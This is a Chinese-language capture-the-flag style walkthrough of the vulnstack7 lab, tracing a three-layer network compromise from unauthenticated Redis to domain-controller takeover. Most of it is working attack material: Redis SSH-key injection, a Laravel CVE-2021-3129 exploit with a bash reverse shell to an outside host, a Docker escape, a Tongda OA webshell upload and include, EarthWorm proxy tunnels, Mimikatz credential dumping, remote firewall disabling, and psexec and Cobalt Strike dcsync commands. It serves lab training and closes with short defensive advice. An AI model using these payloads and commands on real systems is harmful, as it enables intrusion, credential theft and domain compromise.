从Redis未授权到域控沦陷:手把手复现红日vulnstack7靶场的三层网络渗透实战 从Redis未授权到域控沦陷红日vulnstack7靶场三层渗透全解析在网络安全实战演练中多层网络环境的渗透测试往往是最能检验攻防能力的场景。红日安全团队推出的vulnstack7靶场通过精心设计的三层网络架构完美模拟了企业级内网中可能存在的各种安全风险。本文将从一个攻击者的视角详细拆解如何从外网Redis未授权访问漏洞入手逐步突破层层防线最终拿下域控制器的完整过程。1. 靶场环境与攻击路径规划vulnstack7靶场采用典型的企业网络分层架构DMZ区Ubuntu服务器Web1承担对外服务开放80/81端口第二层网络UbuntuWeb2和Windows 7PC1组成业务内网第三层网络Windows Server 2012域控和Windows 7PC2构成核心域环境攻击路径设计遵循由外到内、由浅入深的原则外网突破 → 内网横向 → 权限维持 → 域控拿下2. 外网突破Redis未授权访问利用Redis的6379端口暴露在公网且未设置认证这是第一个突破口。攻击步骤如下密钥生成与注入ssh-keygen -t rsa (echo -e \n\n; cat /root/.ssh/id_rsa.pub; echo -e \n\n) key.txt cat key.txt | redis-cli -h 192.168.1.6 -x set xxxRedis配置篡改config set dir /root/.ssh config set dbfilename authorized_keys saveSSH免密登录ssh -i id_rsa root192.168.1.6成功获取Web1权限后通过分析Nginx配置发现关键信息server { listen 80; server_name localhost; proxy_pass https://whoamianony.top; } server { listen 81; server_name localhost; proxy_pass http://192.168.52.20; }3. 内网渗透Laravel RCE与Docker逃逸3.1 Laravel远程代码执行81端口对应的Laravel v8.29.0存在CVE-2021-3129漏洞使用公开EXP获取Webshell# 生成恶意Payload python laravel_exp.py -t http://192.168.1.6:81 -c bash -c exec bash -i /dev/tcp/192.168.1.9/8888 1通过哥斯拉Godzilla连接Webshell发现环境为Docker容器。3.2 Docker容器提权SUID文件查找find / -perm -us -type f 2/dev/null环境变量劫持echo /bin/bash /tmp/ps chmod 777 /tmp/ps export PATH/tmp:$PATH ./shell # 触发SUID程序调用被篡改的ps3.3 特权模式逃逸利用Docker特权模式挂载宿主机磁盘mkdir /gz mount /dev/sda1 /gz echo ssh-rsa AAA... /gz/home/ubuntu/.ssh/authorized_keys通过SSH登录宿主机后利用CVE-2021-3493提权// exploit.c 编译执行 __attribute__((constructor)) void payload() { setuid(0); system(/bin/bash); }4. 横向移动多层代理与通达OA漏洞利用4.1 网络拓扑探测通过已控主机发现内网结构IP段主要主机服务/角色192.168.52.0192.168.52.20 (Web2)Docker服务192.168.52.0192.168.52.30 (PC1)通达OA系统192.168.93.0192.168.93.30 (DC)域控制器192.168.93.0192.168.93.40 (PC2)域成员主机4.2 EarthWorm多层代理搭建攻击机监听./ew_for_linux64 -s rcsocks -l 1080 -e 1234Web1节点中转nohup ./ew_for_linux64 -s rssocks -d 192.168.1.9 -e 1234Proxychains配置# /etc/proxychains4.conf socks5 127.0.0.1 10804.3 通达OA漏洞利用利用V11.3版本的文件上传漏洞POST /ispirit/im/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary----WebKitFormBoundarypyfBh1YB4pV8McGB ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; nameATTACHMENT; filenameshell.jpg Content-Type: image/jpeg ?php system($_REQUEST[cmd]);?文件包含触发RCEPOST /ispirit/interface/gateway.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded json{url:/general/../../attach/im/2206/shell.jpg}cmdwhoami5. 域控攻陷凭证窃取与权限提升5.1 凭证获取技术Mimikatz提取哈希privilege::debug sekurlsa::logonpasswords获取的凭证信息用户名密码角色AdministratorWhoami2021域管理员bunnyBunny2021域用户moretzMoretz2021域用户5.2 跨网段路由配置三层网络代理链# 攻击机 ./ew_for_linux64 -s lcx_listen -l 1090 -e 1235 # PC1 ew_for_Win.exe -s ssocksd -l 999 # Web1 ./ew_for_linux64 -s lcx_slave -d 192.168.1.7 -e 1235 -f 192.168.52.30 -g 999防火墙绕过技巧net use \\192.168.93.30\ipc$ Whoami2021 /user:Administrator sc \\192.168.93.30 create unablefirewall binpath netsh advfirewall set allprofiles state off sc \\192.168.93.30 start unablefirewall5.3 最终域控接管使用psexec模块进行横向移动use exploit/windows/smb/psexec set rhosts 192.168.93.30 set SMBUser administrator set SMBPass Whoami2021 set payload windows/meterpreter/bind_tcp exploit成功获取域控权限后可通过CSCobalt Strike进行持久化控制# 创建SMB Beacon beacon powershell-import PowerView.ps1 beacon steal_token pid beacon dcsync whoamianony.org administrator6. 防御建议与思考在实际渗透过程中每一步突破都对应着防御体系的缺失。从技术角度看企业网络至少需要边界防护Redis等中间件禁止暴露公网严格ACL策略限制非必要端口内网隔离VLAN划分与网络分段跳板机双因素认证权限控制最小权限原则定期凭证轮换漏洞管理及时修补已知漏洞Web应用防火墙部署这个靶场演练最值得借鉴的是攻击者的迂回战术——当直接攻击域控受阻时转而控制其下属主机再通过凭证窃取实现最终目标。这种层层递进的渗透思路正是现实攻防中最常见的场景。